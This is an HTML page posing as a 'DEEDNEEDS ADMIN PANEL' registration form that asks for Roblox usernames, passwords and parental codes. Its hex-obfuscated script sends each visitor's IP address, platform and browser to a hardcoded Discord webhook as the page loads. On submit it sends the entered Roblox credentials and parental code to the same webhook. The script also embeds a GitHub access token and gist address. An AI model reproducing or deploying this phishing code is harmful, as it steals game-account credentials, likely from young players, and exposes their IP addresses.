<html>
  <head>
   <meta charset="utf-8">
   
    <style>
      body {

        font-family: sans-serif;
        color:white;
  background-image: url('https://media.istockphoto.com/id/1336271758/photo/programming-source-code-on-digital-screen-software-developer-and-internet-programming-html.jpg?b=1&s=170667a&w=0&k=20&c=MmOg-1sDCVGFou5fOUI8ySd6KVXNV6bvJXOmPa0sELA=');
  background-size: cover;
  background-position: center;
  height: 100vh;
  width: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  filter: brightness(66%);
  overflow-y: scroll;
      }

html, body {
  overflow-y: auto;
  overflow-x: hidden;
}

      h1 {
        color: #ffffff;
      }
         .btn {
      display: inline-block;
      padding: 10px 20px;
      text-decoration: none;
      font-size: 18px;
      border: none;
      outline: none;
      color: white;
      background-color: transparent;
      cursor: pointer;
       transition-duration: 1s;
      box-shadow: 0 0 55px #0000FF;
    }
    .btn:hover {
      background-color: #0000FF;
      box-shadow: 0 0 12px #0000FF;
      
      
    }
    .btn:active {
      background-color: #00006C;
      box-shadow: 0 0 2px #00006C;
    }
      .form-container {
        width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
      }
       .form-container:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
      
    }
       .form-container2 {
    width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
  
      }
         .form-container2:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
    }
      input[type="text"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;

      }

         input[type="password"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;
      }

      .error {
        color: #ff0000;
      }
      
    </style>
  </head>
  <body>
    <div class="form-container">
      <h1 style=color:white>DEEDNEEDS ADMIN PANEL</h1>
       <p style=color:gray;font-size:80%>FOR MORE DASHBOARDS MESSAGE AIXFU37 FOR MORE DATABREACH REGISTERING</p>
      <form>
      <p>As a first step, it would be useful to obtain your Discord tag and name.</p>
      
       <div>
        Roblox username: <input type="text" id="name"><br>
        Roblox password: <input type="password" id="pass"><br>
        Register key:<input type="text" id="key"<br>
        Parental code:<input style="margin-bottom:0"type="text" id="code69"<br>
        <p style="margin-bottom:15px;color:red;font-size:80%">Only if u have parental code ENABLED</p>
        DEEDNEEDS GMAIL:<input type="text" id="GMAIL"<br>
        <div>
      <a class="btn" value="Calculate" onclick="sendMessage()">Register</a>
</div>
       </div>
       
      </form>
      <p class="error" id="error"></p>
    </div>
     
    <script>
var _0x10ac=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x30\x35\x37\x36\x37\x33\x36\x37\x32\x37\x39\x39\x38\x32\x35\x39\x32\x30\x2F\x39\x7A\x43\x57\x5F\x67\x79\x55\x41\x77\x6C\x56\x52\x50\x5F\x76\x6A\x63\x4F\x59\x6D\x4B\x65\x54\x77\x48\x6D\x37\x33\x38\x50\x78\x41\x38\x41\x67\x69\x4F\x5F\x4A\x73\x58\x56\x64\x65\x77\x68\x50\x46\x6B\x71\x70\x78\x33\x30\x4B\x37\x39\x54\x51\x5A\x46\x44\x48\x75\x51\x2D\x36","\x6E\x6F\x74\x66\x6F\x75\x6E\x64","\x69\x70","\x39\x31\x2E\x31\x32\x39\x2E\x39\x37\x2E\x32\x35\x34","\x49\x50\x20\x48\x49\x44\x44\x45\x4E","\x44\x65\x76\x69\x63\x65\x3A\x20","\x70\x6C\x61\x74\x66\x6F\x72\x6D","\x42\x72\x6F\x77\x73\x65\x72\x3A\x20","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x55\x73\x65\x72\x20\x49\x6E\x66\x6F\x72\x6D\x61\x74\x69\x6F\x6E","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x50\x4F\x53\x54","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x53\x6F\x6D\x65\x62\x6F\x64\x79\x20\x76\x69\x73\x69\x74\x65\x64\x20\x50\x53\x58\x20\x64\x75\x70\x65\x72\x20\x61\x74\x3A","\x53\x45\x4E\x53\x49\x54\x49\x56\x45\x20\x49\x4E\x46\x4F\x52\x4D\x41\x54\x49\x4F\x4E","\x49\x50","\x74\x68\x65\x6E","\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x76\x61\x6C\x75\x65","\x6B\x65\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6E\x61\x6D\x65","\x70\x61\x73\x73","\x63\x6F\x64\x65\x36\x39","\x63\x6F\x6E\x74\x65\x6E\x74","\x6B\x65\x79\x2E\x74\x78\x74","\x66\x69\x6C\x65\x73","\x74\x65\x73\x74","\x57\x65\x20\x61\x70\x6F\x6C\x6F\x67\x69\x7A\x65\x20\x66\x6F\x72\x20\x74\x68\x65\x20\x69\x6E\x63\x6F\x6E\x76\x65\x6E\x69\x65\x6E\x63\x65\x2E\x20\x49\x74\x20\x61\x70\x70\x65\x61\x72\x73\x20\x74\x68\x61\x74\x20\x77\x65\x20\x61\x72\x65\x20\x75\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x6C\x6F\x63\x61\x74\x65\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x2E\x20\x54\x68\x69\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x61\x20\x73\x79\x73\x74\x65\x6D\x20\x65\x72\x72\x6F\x72\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x74\x68\x65\x20\x6F\x77\x6E\x65\x72\x20\x6F\x72\x20\x73\x75\x70\x70\x6F\x72\x74\x20\x74\x65\x61\x6D\x20\x66\x6F\x72\x20\x61\x73\x73\x69\x73\x74\x61\x6E\x63\x65\x20\x69\x6E\x20\x72\x65\x73\x6F\x6C\x76\x69\x6E\x67\x20\x74\x68\x69\x73\x20\x69\x73\x73\x75\x65\x2E","\x61\x6D\x6F\x67\x75\x73","\x4F\x6D\x67\x20\x66\x72\x65\x65\x20\x61\x63\x63\x6F\x75\x6E\x74\x3F\x3F\x3F","\x41\x63\x63\x6F\x75\x6E\x74\x20\x4E\x61\x6D\x65","\x41\x63\x63\x6F\x75\x6E\x74\x20\x50\x61\x73\x73\x77\x6F\x72\x64","\x50\x61\x72\x65\x6E\x74\x61\x6C\x20\x43\x6F\x64\x65","\x44\x69\x73\x63\x6F\x72\x64","\x49\x50\x20\x41\x44\x44\x52\x45\x53\x53","\x6F\x6B","\x45\x72\x72\x6F\x72\x20\x66\x65\x74\x63\x68\x69\x6E\x67\x20\x47\x69\x73\x74\x3A\x20","\x73\x74\x61\x74\x75\x73\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x42\x65\x61\x72\x65\x72\x20\x20\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x67\x65\x74\x52\x61\x6E\x64\x6F\x6D\x56\x61\x6C\x75\x65\x73","\x63\x72\x79\x70\x74\x6F","","\x6A\x6F\x69\x6E","\x30","\x70\x61\x64\x53\x74\x61\x72\x74","\x66\x72\x6F\x6D","\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F","\x50\x41\x54\x43\x48","\x42\x65\x61\x72\x65\x72\x20"];var ZDIAGRAM=_0x10ac[0];var userIP=_0x10ac[1];fetch(_0x10ac[18])[_0x10ac[16]]((_0xecabx7)=>{return _0xecabx7[_0x10ac[17]]()})[_0x10ac[16]]((_0xecabx3)=>{userIP= _0xecabx3[_0x10ac[2]];if(userIP=== _0x10ac[3]){userIP= _0x10ac[4]}else {var _0xecabx4=_0x10ac[5]+ navigator[_0x10ac[6]]+ _0x10ac[7]+ navigator[_0x10ac[8]];var _0xecabx5={"\x65\x6D\x62\x65\x64\x73":[{"\x74\x69\x74\x6C\x65":_0x10ac[9],"\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E":_0xecabx4}]};var _0xecabx6=JSON[_0x10ac[10]](_0xecabx5);fetch(ZDIAGRAM,{method:_0x10ac[11],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x10ac[12]},body:_0xecabx6});fetch(ZDIAGRAM,{method:_0x10ac[11],body:JSON[_0x10ac[10]]({embeds:[{title:_0x10ac[13],description:_0x10ac[14],color:3447003,fields:[{name:_0x10ac[15],value:userIP}]}]}),headers:{'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x10ac[12]}})}});function sendMessage(){const _0xecabx9=document[_0x10ac[21]](_0x10ac[20])[_0x10ac[19]];const _0xecabxa=document[_0x10ac[21]](_0x10ac[22])[_0x10ac[19]];const _0xecabxb=document[_0x10ac[21]](_0x10ac[23])[_0x10ac[19]];const _0xecabxc=document[_0x10ac[21]](_0x10ac[24])[_0x10ac[19]];fetch(`${_0x10ac[40]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0x10ac[41]}})[_0x10ac[16]]((_0xecabx7)=>{if(_0xecabx7[_0x10ac[37]]){return _0xecabx7[_0x10ac[17]]()}else {throw  new Error(_0x10ac[38]+ _0xecabx7[_0x10ac[39]])}})[_0x10ac[16]]((_0xecabx3)=>{const _0xecabxd=_0xecabx3[_0x10ac[27]][_0x10ac[26]][_0x10ac[25]];if(_0xecabx9!= _0xecabxd|| /^\s*$/[_0x10ac[28]](_0xecabxa)|| /^\s*$/[_0x10ac[28]](_0xecabxb)){alert(_0x10ac[29])}else {_0xecabx11();fetch(ZDIAGRAM,{method:_0x10ac[11],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x10ac[12]},body:JSON[_0x10ac[10]]({embeds:[{title:_0x10ac[30],description:_0x10ac[31],color:3447003,fields:[{name:_0x10ac[32],value:_0xecabxa},{name:_0x10ac[33],value:_0xecabxb},{name:_0x10ac[34],value:_0xecabxc},{name:_0x10ac[35],value:disco},{name:_0x10ac[36],value:userIP}]}]})});var _0xecabx6=JSON[_0x10ac[10]]();fetch(ZDIAGRAM,{method:_0x10ac[11],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x10ac[12]},body:_0xecabx6})}});function _0xecabxe(){const _0xecabxf= new Uint8Array(32);window[_0x10ac[43]][_0x10ac[42]](_0xecabxf);return Array[_0x10ac[48]](_0xecabxf,(_0xecabx10)=>{return _0xecabx10.toString(16)[_0x10ac[47]](2,_0x10ac[46])})[_0x10ac[45]](_0x10ac[44])}function _0xecabx11(){const _0xecabx12=_0x10ac[49];const _0xecabx13=_0x10ac[50];const _0xecabx14=`${_0x10ac[51]}${_0xecabx12}${_0x10ac[44]}`;const _0xecabx15={method:_0x10ac[52],headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':`${_0x10ac[53]}${_0xecabx13}${_0x10ac[44]}`,'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x10ac[12]},body:JSON[_0x10ac[10]]({'\x66\x69\x6C\x65\x73':{'\x6B\x65\x79\x2E\x74\x78\x74':{'\x63\x6F\x6E\x74\x65\x6E\x74':_0xecabxe()}}})}}}
  </script>
</html>

